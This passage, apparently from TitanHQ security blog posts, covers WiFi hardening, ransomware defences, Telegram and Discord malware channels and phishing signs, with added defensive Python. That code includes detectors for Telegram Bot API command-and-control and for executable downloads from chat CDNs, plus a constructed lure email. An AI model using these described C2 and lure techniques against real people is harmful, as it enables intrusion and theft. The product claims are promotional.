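    if any(re.search(p, ssid, re.IGNORECASE) for p in DEFAULT_SSID_PATTERNS):
        findings.append(Finding("MEDIUM", "ssid", "SSID looks like a factory default; give it a name customers recognize"))
    if str(cfg.get("admin_username", "")).lower() in DEFAULT_ADMIN_NAMES:
        findings.append(Finding("HIGH", "admin_username", "administrator login still uses a default username"))
    if not password_meets_policy(str(cfg.get("admin_password", ""))):
        findings.append(Finding("HIGH", "admin_password", "administrator password does not meet the policy"))
    if not cfg.get("schedule_business_hours_only"):
        findings.append(Finding("LOW", "schedule", "radio is on around the clock; limit it to business hours"))
    return findings


# Constructed configurations: a freshly unboxed router and a hardened one.
LATEST_FIRMWARE = "1.2.5"
WEAK = {
    "ssid": "NETGEAR_A1B2", "security_mode": "WEP", "wps_enabled": True,
    "guest_isolation": False, "firmware_version": "1.0.0",
    "admin_username": "admin", "admin_password": "password",
    "schedule_business_hours_only": False,
}
HARDENED = {
    "ssid": "Brew & Bean Guest", "security_mode": "WPA3", "wps_enabled": False,
    "guest_isolation": True, "firmware_version": "1.2.5",
    "admin_username": "brewbean-ops", "admin_password": "correct horse battery staple",
    "schedule_business_hours_only": True,
}

if __name__ == "__main__":
    for f in audit(WEAK, LATEST_FIRMWARE):
        print(f"[{f.severity}] {f.check}: {f.message}")
    print("hardened findings:", len(audit(HARDENED, LATEST_FIRMWARE)))
```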
Use a Web Filter
A web filtering solution is an essential protection for all WiFi networks. Web filters will prevent users from visiting websites and web pages that are known to have been compromised or have been confirmed as malicious. This will protect your customers from web-based threats such as drive-by downloads, exploit kits, and phishing. A web filter will also allow you to prevent your network from being used to download or view unacceptable content such as pornography and lets you control bandwidth usage to ensure all customers can enjoy decent Internet speeds.
TitanHQ offers a scalable, easy to deploy, granular web filter for WiFi networks. WebTitan Cloud for WiFi requires no hardware purchases or software downloads as it is 100% cloud-based, can be managed and monitored from any location, and can help protect you against the most common wireless network attacks.
Features of WebTitan Cloud for WiFi
No hardware or software installation required
Quick and easy to implement
Fast: DNS solution provides almost zero additional latency
Supports both static and dynamic IP addresses
No specialist training required
Protects against all web-based threats
Precision control over the content that can be accessed over WiFi
Instant alerts about users trying to access restricted content
Can be integrated into existing systems for easy management
Available to MSPs and resellers in white-label form
Fully multi-tenanted platform
WebTitan Cloud for WiFi, like all TitanHQ solutions, is available on a free trial so you can evaluate the full solution in your own environment. During the trial, you will receive full product support to ensure you get the most out of it.
Contact TitanHQ today to arrange your trial, for details of pricing, or to book a product demonstration. Our Customer Service team will be more than happy to answer any questions you have about the product.
Web Filtering FAQs
How can I make my guest Wi-Fi network secure?
You should change your SSID from the default, set a strong password, enable encryption (WPA2 or WPA3), place guests on a separate network or VLAN so they cannot reach router settings or local network resources, enable client isolation so guest devices cannot talk to each other, and set up a web filtering solution to restrict access to potentially harmful web content.
How much does content filtering cost?
You can expect to pay between $1 and $3 per user, per month depending on the Wi-Fi content filtering solution you choose. At TitanHQ, we offer powerful content filtering at an affordable price for all businesses. WebTitan Cloud for Wi-Fi starts at $1.01 per user per month.
What is the best way to block phishing attacks?
Two anti-phishing solutions that businesses should implement are an email security gateway or spam filter to block malicious emails and a web filter to prevent employees from visiting phishing websites, either from links in malicious emails or through web browsing and redirects.
How easy is it to start filtering the Internet?
With WebTitan Cloud for Wi-Fi, content filtering is easy. Simply point your DNS to WebTitan, log in to your web-based user interface, then select the categories of content you want to block. It is that simple. Everything is intuitive and you have additional options if you want more precise control or need to implement different controls for different user groups. If ever you get stuck, you benefit from world-class customer support to get you back on track.
Should I enable SSL inspection?
SSL inspection allows you to inspect traffic to and from encrypted websites. Since most websites now encrypt the connection between the site and the browser, this traffic is invisible to a filter unless SSL inspection is enabled. Malicious websites routinely have valid certificates, so a certificate alone says nothing about whether a site is safe. Note that inspection works by terminating the TLS session at the filter and re-signing it with a certificate the devices must trust, so the filter's root certificate has to be deployed to managed devices, and applications that use certificate pinning will need to be excluded from inspection.
It has been a particularly bad year for ransomware attacks on businesses. Many of the attacked businesses have been unprepared for a ransomware attack and did not implement sufficient ransomware mitigations. Had proactive steps been taken, many of the attacks could have been prevented.
Recently, the DarkSide ransomware operation attacked a critical infrastructure firm and brought fuel delivery to the Eastern Seaboard in the United States to a halt. The fuel pipelines that delivered 45% of the fuel required by the U.S. East Coast were shut down for 5 days due to the attack. Better preparation and more extensive ransomware mitigations could have prevented the attack or at least hastened recovery. The company could also have avoided the $5 million ransom payment and major losses from disruption to operations.
The DarkSide ransomware gang had also attacked the second largest chemical distribution firm in the United States earlier in May, again causing major disruption to operations. In that case, a ransom of around $4.4 million was paid to the gang for the keys to unlock files and to prevent the release of sensitive business data stolen in the attack. The ransom payment was negotiated down from $7.5 million, and as part of that negotiation and payment process, the attacker provided details about how network access was gained. The attacker had purchased stolen credentials from another threat actor. The DarkSide ransomware affiliate also provided some useful advice – Improve your antivirus software and implement multi-factor authentication. These are two important ransomware mitigations that could well have stopped the attack dead.
These are just two examples of recent attacks by one ransomware gang. There are currently more than 17 ransomware gangs that steal data prior to encrypting files and many more that simply encrypt files and demand a ransom for the keys. The threat from ransomware also continues to grow. The Verizon 2021 Data Breach Investigations Report shows ransomware attacks increased by 6% in 2020 and accounted for 10% of all data breaches.
Ransomware gangs, and the affiliates that conduct the attacks, use a range of different methods to get the network access they need. Vulnerabilities in software and operating systems are exploited, and attacks are conducted on Remote Desktop Protocol (RDP) and remote access solutions such as VPNs. Phishing is commonly used to steal credentials that provide access to accounts, malware such as remote access Trojans is used to gain access to networks, and several other tactics are used. Consequently, there is no single cybersecurity measure that can block these attacks. Multiple ransomware mitigations are required to cover each of the attack vectors.
Ransomware Mitigations to Prevent Attacks and Ensure a Fast Recovery
There are several ransomware mitigations that can be implemented to reduce the risk of ransomware attacks and limit the severity of an attack should a network be compromised.
Implement a robust spam filter – A robust spam filter will block phishing attacks and malware delivered via email. Phishing is one of the most common methods of gaining access to networks.
Implement multi-factor authentication – Stolen credentials, including those obtained in phishing attacks, allow ransomware actors to access networks. Multi-factor authentication is an effective measure for preventing stolen credentials from being used.
Conduct end user security awareness training – Ensure employees know how to identify phishing emails and are taught cybersecurity best practices and discourage risky behavior.
Filter network traffic with a web filter – Implement a web filter to block access to malicious websites and prevent communications with known malicious IP addresses.
Purchase top-grade AV software – Implement an advanced anti-virus solution, ensure it is set to update automatically, and conduct regular scans of all IT assets for malware.
Patch promptly and update software – Prompt patching is important to prevent the exploitation of vulnerabilities. Prioritize patching to address the most critical vulnerabilities first. Most vulnerabilities exploited in attacks are months old, yet patches were not applied. Also ensure software and operating systems are updated regularly.
Restrict access to network resources – Apply the principle of least privilege and severely limit administrative access and the ability to install and execute programs.
Restrict or block Remote Desktop Protocol (RDP) – Assess whether RDP is required and block if possible. If needed, ensure originating sources are restricted and implement multi-factor authentication.
Disable macro scripts in Office files – Disable Office macros on all computers unless there is a business need for allowing them. Open Office files sent via email using Office Viewer software rather than the full Office application.
Use application allowlisting – Only permit applications and systems to execute programs allowed by your security policy. Block the execution of programs from commonly used ransomware locations such as temporary folders and the LocalAppData folder.
Implement a strong backup policy – Ensure backups of critical data are regularly created and tested to ensure file recovery is possible. Store a copy of the backup in a secure offline location.
Implement network segmentation – In the event of an attack, it is important that the attackers cannot access all systems and networks. Use network segmentation to limit the harm that can be caused.
Block inbound connections from Cobalt Strike servers – Also block the use of other post-exploitation tools as far as is possible.
Block inbound connections from anonymization services – Block access from Tor and other anonymization services to IP addresses and ports where external connections are not expected or necessary.
A new version of WebTitan Cloud has been released – WebTitan Cloud 4.16 – that includes support for Azure Active Directory and introduces a new school web filtering solution – WebTitan OTG (on-the-go) for Chromebooks.
The new version of WebTitan Cloud includes DNS Proxy 2.06, which supports filtering of users in Azure Active Directory in addition to the existing integration with on-premises Active Directory. Further directory services will be added to meet customer needs and ensure they can enjoy the benefits of per-user filtering with exceptional ease of management.
Existing WebTitan customers need do nothing to get the latest WebTitan Cloud release as the solution will be updated automatically.
WebTitan OTG for Chromebooks
Using WebTitan OTG for Chromebooks provides an effective way to apply filtering policies to your Chromebooks from the cloud.
WebTitan OTG for Chromebooks is a new web filtering solution for the education sector that allows schools to carefully control the websites that can be accessed by students both in the classroom and offsite, including in students’ homes.
Schools can easily devise filtering policies for all pupils or specific age groups and apply those filtering polices in the cloud. The solution allows schools to enforce the use of Safe Search and prevent access to age-inappropriate web content to keep students safe.
WebTitan OTG for Chromebooks delivers fast and effective user- and device-level web filtering and empowers students to discover the Internet in a safe and secure fashion, while also ensuring compliance with federal and state laws such as the U.S. Children’s Internet Protection Act (CIPA).
The solution is cost effective for schools to implement, setup and management are quick and easy, and administrators can schedule or run usage reports on demand and have full visibility into Chromebook users’ online activities and locations. It is also possible to lock down Chromebooks to prevent students from circumventing the web filtering controls.
As with all WebTitan Cloud solutions, there is no need for any on-premises hardware, no proxies or VPNs required, and there is no impact on Internet speed as filtering takes place at the DNS-level before any content is downloaded.
“This new release comes after an expansive first quarter. The launch of WebTitan Cloud 4.16 brings phenomenal new security features to our customers,” said TitanHQ CEO, Ronan Kavanagh. “After experiencing significant growth in 2020, TitanHQ expects these product enhancements and new features to make 2021 another record-breaking year.”
Telegram is a popular messaging app that has seen user numbers soar in recent months, with many users of WhatsApp making the change to Telegram after recent changes to the WhatsApp privacy and data management policies.
Telegram has also proven popular with cybercriminals who are using the app for distributing and communicating with malware. Recently, a campaign has been identified involving a new malware variant dubbed ToxicEye. ToxicEye malware is a Remote Access Trojan (RAT) that gives an attacker full control of an infected device. The malware is used to steal sensitive data and download other malware variants.
The malware uses a Telegram account for its command and control server communications. Through the attacker’s Telegram account, they can communicate with a device infected with ToxicEye, exfiltrate data, and deliver additional malicious payloads.
It is easy to see the attraction of using Telegram for malware communication. First, the app is popular. Telegram was the most downloaded app in January 2021, with more than 63 million downloads that month, and has around 500 million active users worldwide. During the pandemic the app has been adopted by many businesses to allow their remote workers to communicate and collaborate. The app supports encrypted, private messaging, and most businesses allow Telegram to be used and do not block or inspect its communications.
Setting up a Telegram account is easy and attackers can remain anonymous. All that is required to set up an account is a mobile phone number, and the communication infrastructure allows attackers to easily exfiltrate data and send files to malware-infected devices undetected.
Telegram is also being used for distributing malware. Attackers can create an account, use a Telegram bot to interact with other users and send files, and it is also possible to send files to non-Telegram users via phishing emails with malicious attachments. It is phishing emails that are being used to deliver ToxicEye malware. Emails are sent with a .exe file attachment, with one campaign using a file named “paypal checker by saint.exe” to install the malware.
If the attachment is opened and run, the RAT installs and connects to the attacker’s Telegram bot, which then serves as the command and control channel: the attacker issues commands through the bot and can push further payloads to the infected device. The attackers can perform a range of malicious activities once the malware is installed, with their primary goals being gathering information about the infected device, locating and exfiltrating passwords, and stealing cookies and browser histories.
ToxicEye malware can kill active processes and take control of Task Manager, record audio and video, steal clipboard contents, and deploy other malware variants – such as keyloggers and ransomware.
TitanHQ offers two solutions that can protect against ToxicEye and other Telegram-based phishing and malware campaigns. SpamTitan is a powerful email security solution that will block malicious emails delivering the executable files that install the ToxicEye RAT and other malware. For even greater protection, SpamTitan should be combined with WebTitan web security. WebTitan is a DNS-based web filtering solution that can be configured to block access to Telegram if it is not in use and monitor traffic in real time to identify potentially malicious communications.
For further information on both of these solutions, details of pricing, and to register for a free trial, contact TitanHQ today.
Cloud-based instant messaging platforms have allowed individuals to easily communicate and collaborate, but cybercriminals are also benefitting from these platforms and are abusing the services for a range of malicious purposes. Discord is one such platform that has been favored by cybercriminals for several years and is now being extensively used for phishing and malware distribution.
Discord is a VoIP, instant messaging and digital distribution platform that has been extensively adopted by the gaming community and latterly by a much broader range of users. By 2019, Discord had amassed around 150 million users worldwide, and its user base has grown considerably since then. The platform has long been abused by cybercriminals, who have used its live chat feature for selling and trading stolen data such as gift cards and login credentials and for anonymous communications, and its infrastructure has also been abused as command and control (C2) for communicating with malware-infected devices.
In 2021, the platform has been increasingly used for distributing a wide range of malware variants such as information stealers, cryptocurrency miners, Remote Access Trojans, and ransomware by abusing the cdn.discordapp.com service.
Discord, like other collaboration apps, uses a content delivery network (CDN) to store files shared within channels. Cybercriminals can upload malicious files to Discord and generate a public link that can be shared with anyone, not just Discord users. The URL starts with https://cdn.discordapp.com/, so anyone receiving the link sees a link to a legitimate site. While there are controls to prevent malicious files from being uploaded, cybercriminals often bypass those protections and get their files hosted, and users are not always warned about the risk of downloading files from Discord. Because the payloads are delivered over HTTPS, the downloads are invisible to security solutions that do not inspect TLS traffic.
Further, once uploaded, the malware can be deleted from a chat, but it is still accessible using the public URL. Users are often tricked into downloading these malicious files under the guise of pirated software or games. Gamers have been targeted as their PCs typically have a high spec for gaming, which makes them ideal for cryptocurrency mining.
This method of malware distribution allows malware developers and distributors to deliver their payloads easily and with a high degree of anonymity. An analysis by Zscaler identified more than 100 unique malware samples served from Discord in the Zscaler cloud in just a two-month period. Another analysis of Discord CDN URLs identified around 20,000 results on VirusTotal.
Discord is far from the only communication and collaboration solution to be abused. Slack and Telegram are similarly being abused in phishing campaigns and for malware distribution.
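As an added example (not code from TitanHQ or from the research cited above), the Python below runs detection logic over constructed proxy-log lines for the two patterns discussed here and in the ToxicEye post above: executable downloads from chat-platform CDNs such as cdn.discordapp.com, and requests to the Telegram Bot API path, which is the channel a RAT like ToxicEye uses to talk to its operator. It also shows what a DNS-layer filter can decide without TLS inspection, which is the hostname only; note that cdn.discordapp.com sits under discordapp.com, not discord.com, so a block list naming only discord.com leaves the CDN reachable. The log format, usernames, IP addresses, file names and bot token are invented for the example, and the hostname and extension lists are assumptions to tune for a real environment.

```python
# Added example (not TitanHQ code): detection over constructed proxy-log lines.
# Log format, hostname/extension lists, users, IPs and the bot token are all assumptions.
import re
from urllib.parse import urlparse

# Constructed traffic, one request per line: epoch src_ip user method url status content_type
PROXY_LOG = """\
1618900001 10.0.0.21 jdoe GET https://discord.com/channels/1234/5678 200 text/html
1618900002 10.0.0.21 jdoe GET https://cdn.discordapp.com/attachments/1234/5678/GameCrack.exe 200 application/x-msdownload
1618900003 10.0.0.34 asmith POST https://api.telegram.org/bot123456789:AAFakeTokenForExample_abc/getUpdates 200 application/json
1618900004 10.0.0.34 asmith GET https://api.telegram.org/bot123456789:AAFakeTokenForExample_abc/getFile?file_id=1 200 application/json
1618900005 10.0.0.50 mlee GET https://cdn.discordapp.com/attachments/1234/9999/holiday.png 200 image/png
1618900006 10.0.0.50 mlee GET https://slack-files.com/files-pri/T0/F0/report.docm 200 application/vnd.ms-word.document.macroEnabled.12
"""

CHAT_FILE_HOSTS = {"cdn.discordapp.com", "media.discordapp.net", "slack-files.com", "files.slack.com"}
RISKY_EXT = {"exe", "scr", "msi", "bat", "js", "vbs", "lnk", "dll", "iso", "zip", "docm", "xlsm"}
BINARY_TYPES = {"application/x-msdownload", "application/x-dosexec", "application/octet-stream"}
BOT_TOKEN_RE = re.compile(r"/bot(\d+):([A-Za-z0-9_-]+)/")  # Telegram Bot API path prefix


def parse_line(line):
    ts, src, user, method, url, status, ctype = line.split()
    return {"ts": int(ts), "src": src, "user": user, "method": method,
            "url": url, "status": int(status), "ctype": ctype}


def classify(rec):
    """Return an alert string for one request, or None if it matches no rule."""
    u = urlparse(rec["url"])
    host = (u.hostname or "").lower()
    name = u.path.rsplit("/", 1)[-1]
    ext = name.rsplit(".", 1)[1].lower() if "." in name else ""
    # Rule 1: executable or macro-enabled file served from a chat platform's file CDN.
    if host in CHAT_FILE_HOSTS and (ext in RISKY_EXT or rec["ctype"] in BINARY_TYPES):
        return (f"{rec['user']}@{rec['src']} downloaded {name} ({rec['ctype']}) "
                f"from chat-platform CDN {host}")
    # Rule 2: Bot API call; browsers and the desktop client do not use /bot<id>:<token>/ paths.
    if host == "api.telegram.org" and BOT_TOKEN_RE.search(u.path):
        # The token is a credential: keep the bot id for the ticket, redact the secret.
        safe_path = BOT_TOKEN_RE.sub(r"/bot\1:<redacted>/", u.path)
        return f"{rec['user']}@{rec['src']} used the Telegram Bot API: {rec['method']} {safe_path}"
    return None


def detect(log_text):
    alerts = []
    for line in log_text.splitlines():
        if line.strip():
            alert = classify(parse_line(line))
            if alert:
                alerts.append(alert)
    return alerts


def dns_only_decision(hostname, blocked_services):
    """What a DNS-layer filter can decide without TLS inspection: the hostname only,
    matched label by label against the block list (no path, no file name)."""
    labels = hostname.lower().split(".")
    for i in range(len(labels) - 1):
        if ".".join(labels[i:]) in blocked_services:
            return "block"
    return "allow"


if __name__ == "__main__":
    for alert in detect(PROXY_LOG):
        print("ALERT:", alert)
    for host in ("discord.com", "cdn.discordapp.com"):
        print(host, "->", dns_only_decision(host, {"discord.com"}))
```

The two rules need the full URL, which is only available when the filter performs HTTPS inspection; with DNS-only filtering the decision collapses to allow or block the whole service, as dns_only_decision shows.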
How TitanHQ Can Improve Your Organization’s Security Posture
TitanHQ offers two cybersecurity solutions that can be configured to block the use of these legitimate platforms in the workplace and stop malicious links from being distributed to their employees. WebTitan is a powerful but easy-to-use DNS filtering and web security solution that can be configured to block access to sites such as Discord, thus preventing employees from visiting malicious content. Since WebTitan performs malware scans in real time, if malicious files are encountered, employees will be prevented from downloading them. WebTitan supports HTTPS (SSL) inspection so can decrypt, scan, then re-encrypt traffic to identify and block malicious content.
Malicious links to Discord are often distributed via phishing emails. SpamTitan Email Security prevents malicious emails from being delivered to inboxes, such as emails containing links to Discord, Telegram, or other services that are abused by cybercriminals and used to host phishing kits or malware.
Both solutions work seamlessly together to protect against email- and web-based cyberattacks and prevent credential theft, and malware and ransomware attacks. Both solutions are cost effective to implement and easy-to-use and are much loved by IT staff who benefit from a high level of protection coupled with a low management overhead.
If you want to improve protection from email and web-based attacks, contact TitanHQ today to find out more about these award-winning cybersecurity solutions. Both solutions are available on a free trial and a product demonstration can be arranged on request.
Further, these solutions have been developed to be MSP-friendly, with a range of benefits for managed service providers who want to improve email and web security for their clients.
Do you want to help the workforce learn how to identify fake emails to stop them divulging their credentials on phishing websites or inadvertently downloading malware onto their computers? In this post we outline some of the signs of phishing emails that everyone should be looking for every time an email is opened to confirm whether it is legitimate or if it is likely a phishing email, email impersonation scam, or poses a network security threat.
What Threats are Sent via Email?
Email is the most common way for cybercriminals to breach company defenses. It has been estimated that 91% of all cyberattacks start with a phishing email. Phishing is the name given to an attempt to obtain sensitive information by deception, often by impersonating a trusted entity. Phishing can occur over the telephone, text message, social media networks, or instant messenger services, but most commonly it occurs via email. Phishing emails also deceive people into downloading malicious files that install malware or ransomware. One response to a phishing email is all it takes for cybercriminals to obtain login details that allow them to access email accounts and cloud services, steal large quantities of sensitive data, or gain the foothold they need for an extensive compromise of a business network.
If you have a powerful email security solution installed, the majority of phishing emails and other email threats will be blocked, but no email security solution will provide complete protection, so everyone needs to learn how to identify fake emails and know what they should do if such an email is received.
Employees Must Receive Security Awareness Training
In certain industries, security awareness training for the workforce is mandatory, and it is necessary to teach employees how to identify fake emails. In the United States, for example, regular security awareness training is a requirement of the Health Insurance Portability and Accountability Act (HIPAA). All healthcare organizations must ensure that their employees can identify fake emails such as those used for phishing.
Even if not required by law, security awareness training is strongly advised. Employees cannot be expected to know the difference between a genuine and a scam email if they are not taught what to look for. By providing this training regularly you can condition your employees to always conduct checks to identify fake emails, which will help you to prevent costly data breaches.
How to Identify Fake Emails!
Cybercriminals regularly change their tactics, techniques and procedures to evade security defenses and fool people into divulging sensitive information or installing malware. The themes of malicious emails and lures in phishing emails often change, but there are commonalities in many of these scams which are detailed below. A scam or phishing email may include one or more of these tactics or techniques.
Be aware that just because an email appears to have been sent from a known and trusted email address or person, or a company with the right branding and logos, it does not mean that the email is genuine. You should still carefully check the message before responding or taking any action suggested in the message.
Phishing and scam emails usually have a sense of urgency. Attackers want you to act quickly without thinking, as the longer you take, the more likely it is you will identify the email for what it really is.
Phishing and scam emails often include a threat of negative consequences if no action is taken. Your account will be closed, you will lose access to a service, you will have to pay a fine, or you will be arrested, are all common ways to convey urgency and get people to take the action suggested in the email.
Scammers often use FOMO, bargains, or rewards to encourage people to get in touch or visit a website. A too-good-to-be-true offer such as a new iPhone for $100 or a prize in a competition that you haven’t entered is a common ruse to get people to click a malicious link.
Requests for Sensitive Information
The easiest way to obtain sensitive information is simply to ask for it. You should stop, think, and carefully consider any request to send sensitive information via email. Make sure the email address – not just the display name – is correct and try to call to confirm requests to send sensitive information or change payment details using verified contact information – Not contact information supplied in the email.
Hyperlinks are often included to get past email security defenses and direct individuals to scam websites. The URL is often masked with different text so hover your mouse arrow over the link to find the destination URL. URL shortening services are often used to hide the true destination URL. The URL linked in a message may also not be the destination URL as you may be redirected via multiple websites before landing on a page. Make sure you carefully check the URL and any domain you land on. If in doubt, do not click hyperlinks in emails.
Attachments are often given double extensions to make them appear legitimate (invoice.doc.exe); because Windows hides known file extensions by default, such a file can display simply as invoice.doc. Simply opening these files is all it takes to install malware. Office macros are also used to download malware if they are allowed to run. Scan email attachments with AV software before opening them and do not enable content unless you are certain the attachment is genuine. Treat all email attachments as suspicious, and never open a file with an unfamiliar, unusual, or suspicious extension (.zip, .scr, .js, .exe, .vbs, .bat, .com, .msi, .jse, .lnk, .vb, etc.).
Irregular email addresses and domains
The display name and the actual email address are often very different, so check the actual address, not just the name shown. Legitimate companies do not send from public email domains (the part after the @) such as gmail.com. Check that the domain is the one the company actually uses: paypal.com is genuine; pay–pal.com is not. Also check that the domain is spelled correctly with no missing or transposed letters, and look out for substituted characters such as rn in place of m, a zero in place of an o, and the digit 1 or a capital I in place of a lowercase l.
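As an added example (not code from TitanHQ or this article), the Python script below applies several of the checks above to a raw message: the display name versus the actual sender domain, public mail domains, lookalike domains built with homoglyphs (rn for m, 0 for o, 1 for l) or extra hyphens, link text that shows one site while the href points at another, URL shorteners, and attachments with double or risky extensions. The sample message, the brand allowlist, the free-mail and shortener lists and the homoglyph table are all constructed assumptions to tune for a real deployment, and the registrable-domain helper takes the last two labels where production code would use the public suffix list.

```python
# Added example (not TitanHQ code): heuristic checks for the indicators above; lists are assumptions.
import email
from email import policy
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

FREE_MAIL = {"gmail.com", "outlook.com", "hotmail.com", "yahoo.com"}
TRUSTED_BRANDS = {"paypal": "paypal.com", "microsoft": "microsoft.com"}  # brand -> real domain
SHORTENERS = {"bit.ly", "tinyurl.com", "t.co"}
RISKY_EXT = {"exe", "scr", "js", "jse", "vbs", "vb", "bat", "com", "msi", "lnk", "zip"}
HOMOGLYPHS = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l")]  # lookalike substitutions

# Constructed sample message for this example; not taken from a real campaign.
SAMPLE_EMAIL = b"""From: "PayPal Billing" <billing@paypa1-secure.com>
Subject: Urgent: your account will be suspended
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; charset=utf-8

<p>Please verify now: <a href="https://bit.ly/3xyz">https://www.paypal.com/login</a></p>
--b1
Content-Type: application/octet-stream; name="invoice.pdf.exe"
Content-Disposition: attachment; filename="invoice.pdf.exe"

TVqQAAMAAAAEAAAA//8AAA==
--b1--
"""

def registrable(host):
    """Last two labels; production code should use the public suffix list."""
    return ".".join(host.lower().split(".")[-2:])

def normalize(domain):
    """Undo common lookalike tricks: paypa1-secure.com compares as paypalsecure.com."""
    d = domain.lower().replace("-", "")
    for fake, real in HOMOGLYPHS:
        d = d.replace(fake, real)
    return d

def check_sender(msg):
    name, addr = parseaddr(msg.get("From", ""))
    domain = registrable(addr.rpartition("@")[2])
    findings = []
    if domain in FREE_MAIL:
        findings.append(f"sender uses public mail domain {domain}")
    for brand, real in TRUSTED_BRANDS.items():
        claims_brand = brand in name.lower() or brand in normalize(domain)
        if claims_brand and domain != real:  # names the brand but is not the brand's own domain
            findings.append(f"sender {addr} claims {brand} but is not {real}")
    return findings

class LinkCollector(HTMLParser):
    def __init__(self):  # collects (href, visible text) pairs from an HTML body
        super().__init__()
        self.links, self._href, self._text = [], None, []
    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href", ""), []
    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)
    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None

def check_links(msg):
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        collector = LinkCollector()
        collector.feed(part.get_content())
        for href, text in collector.links:
            host = urlparse(href).hostname or ""
            if registrable(host) in SHORTENERS:
                findings.append(f"link uses URL shortener {host}")
            shown = urlparse(text).hostname if text.startswith(("http://", "https://")) else None
            if shown and registrable(shown) != registrable(host):  # text says one site, href another
                findings.append(f"link text shows {shown} but points to {host}")
    return findings

def check_attachments(msg):
    findings = []
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        pieces = name.split(".")
        if len(pieces) > 2:  # invoice.pdf.exe: Explorer with hidden extensions shows invoice.pdf
            findings.append(f"attachment {name} has a double extension")
        if pieces[-1] in RISKY_EXT:
            findings.append(f"attachment {name} has risky extension .{pieces[-1]}")
    return findings

def scan(raw_message):
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    return check_sender(msg) + check_links(msg) + check_attachments(msg)
```

Running scan(SAMPLE_EMAIL) returns five findings for the constructed message: the lookalike sender, the shortener, the link text and href mismatch, and the double and risky extension on the attachment. These heuristics are a triage aid, not a verdict; a clean result does not make a message safe, which is why the article pairs user training with a filtering solution.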
Spelling and grammar
Scammers are good at scamming, but often not so good at spelling. Many attackers do not speak English as their first language, so mistakes are often made with spelling and grammar. These mistakes can be deliberate to ensure only people who are likely to fall for the next stage of the scam respond.
Malicious emails often convince people to take out of the ordinary actions, such as requests to help out a colleague or boss by buying gift cards. Any out-of-band request should be confirmed with a quick phone call, but not using any contact information supplied in the email.
Odd salutations and message tone
How messages are addressed is a good indicator of whether the message is genuine. Most emails from companies now address recipients by name. If Netflix emails you and addresses you as Dear Customer, it could well be a scam. Attackers will probably not be used to the tone of emails usually sent when they conduct email impersonation attacks and may be overly familiar or unnaturally formal.
Block More Email Threats with an Advanced Email Security Solution
Many phishing and scam emails are highly sophisticated and are very difficult to distinguish from genuine emails, even by employees who have been trained how to identify fake emails. Messages can be sent from genuine email accounts that have been compromised, past message threads can be hijacked, and genuine logos and layouts used when companies are spoofed. Training the workforce how to identify fake emails is important, but you also need an advanced spam filtering solution in place to ensure the vast majority of these emails are blocked and not delivered to inboxes.
If you want to improve your defenses against email attacks, contact the TitanHQ team and ask about SpamTitan. SpamTitan is an easy to use, powerful email security solution that will keep you protected from scams and emerging and zero-day email threats. Furthermore, SpamTitan is one of the most cost-effective email security solutions on the market for businesses of all sizes.
The disruption to learning from a pandemic that has lasted more than a year is bad enough, but many schools have experienced even more disruption just as many have opened their gates and allowed students back into classrooms. The SARS-CoV-2 virus may have been brought under control thanks to lockdown measures and the rollout of vaccines, but another type of virus is proving to be a major threat – ransomware.
FBI Warns of Targeted Ransomware Attacks on K12 Schools and Higher Education
Ransomware attacks on schools have been stepped up in recent months and schools and higher education institutions are being actively targeted. In the United States, the Federal Bureau of Investigation recently issued an alert to the education sector warning about the threat of attacks involving Pysa ransomware. The threat actors behind this ransomware variant have been actively targeting K12 schools, higher education, and seminaries. Buffalo City Schools were forced to close their schools in March following a ransomware attack that crippled their IT systems, just before students were about to return to classrooms as part of a phased reopening of schools.
The ransomware is deployed manually after compromising the network. The attack often starts with a phishing email, which gives the attackers the foothold in the network they need. They then conduct reconnaissance, move laterally, and compromise entire networks before deploying their ransomware.
Prior to running the encryption routine that cripples IT systems, the attackers steal sensitive data. Files containing student information are obtained, and threats are issued to publish or sell the stolen data if the ransom is not paid. The gang, like many others, has a leak site and routinely follows through on the threat.
Spike in Ransomware Attacks on UK Schools
Ransomware attacks on schools are not confined to the United States. The Pysa ransomware gang is also targeting schools in the United Kingdom and many other countries, and the Pysa gang is not alone. Many other ransomware operations have been attacking schools.
Following a rise in ransomware attacks on UK schools, the UK’s National Cyber Security Centre (NCSC) issued an alert to educational institutions about the growing threat of attacks. NCSC has observed an increase in ransomware attacks on schools from late February 2021, which coincides with students returning to classrooms after an extensive period of school closures due to the pandemic.
The NCSC said there is no reason to believe that these attacks are being conducted by the same criminal group. This appears to be the work of multiple threat groups. These attacks have caused varying levels of disruption, including rendering entire networks inoperable, disabling email and websites, and hampering the ability of students to learn. In some cases, students have lost coursework as a result of the attacks, records of COVID-19 tests have been rendered inaccessible, and school financial records have been lost.
Unfortunately, even paying the ransom is no guarantee of being able to recover encrypted files. While the attackers claim they have the keys to unlock the encryption, they may not be provided. There is also no guarantee that stolen data will be deleted when the ransom is paid. There have been many cases when further ransom demands have been issued after payment has been made.
Adopt a Defense in Depth Strategy to Block Ransomware Attacks
The Department for Education (DfE) has recently urged UK schools to review their cybersecurity defenses and take the necessary steps to harden their defenses against cyberattacks. The NCSC explained that there is no single cybersecurity solution that will provide protection against these attacks. What is required is a defense in depth approach to security.
Defense in depth means implementing multiple overlapping layers of security. If one layer fails to block an attack, others are in place to block the attack.
In practice this means good patch management – applying updates to software, firmware, and operating systems promptly. Antivirus software must be installed on all devices and be kept up to date. Spam filtering solutions should be implemented to block the phishing emails that give the attackers access to the network. These filters can also be used to block email attachments that are not typically received.
Web filters should be used to block access to malicious websites. These filters inspect the content of websites to determine if it is malicious. They also categorize web content, and the filters allow schools to carefully control the types of content that students and staff can access to reduce risk.
Multi-factor authentication should be implemented on all remote access points and email accounts, remote access ports that are not being used should be closed, and a VPN should be used for remote access. The rule of least privilege should be applied to remote access and to all staff and student accounts.
It is also recommended that non-administrator accounts are prevented from installing software, that Office macros are disabled, and that autorun is disabled for portable devices.
It is also vital that all files are backed up daily and that backups are tested to make sure file recovery is possible. Backups should be stored on non-networked devices and must not be accessible from the systems where the data resides. Ideally, multiple backup copies should be created, with at least one stored on an air-gapped device.
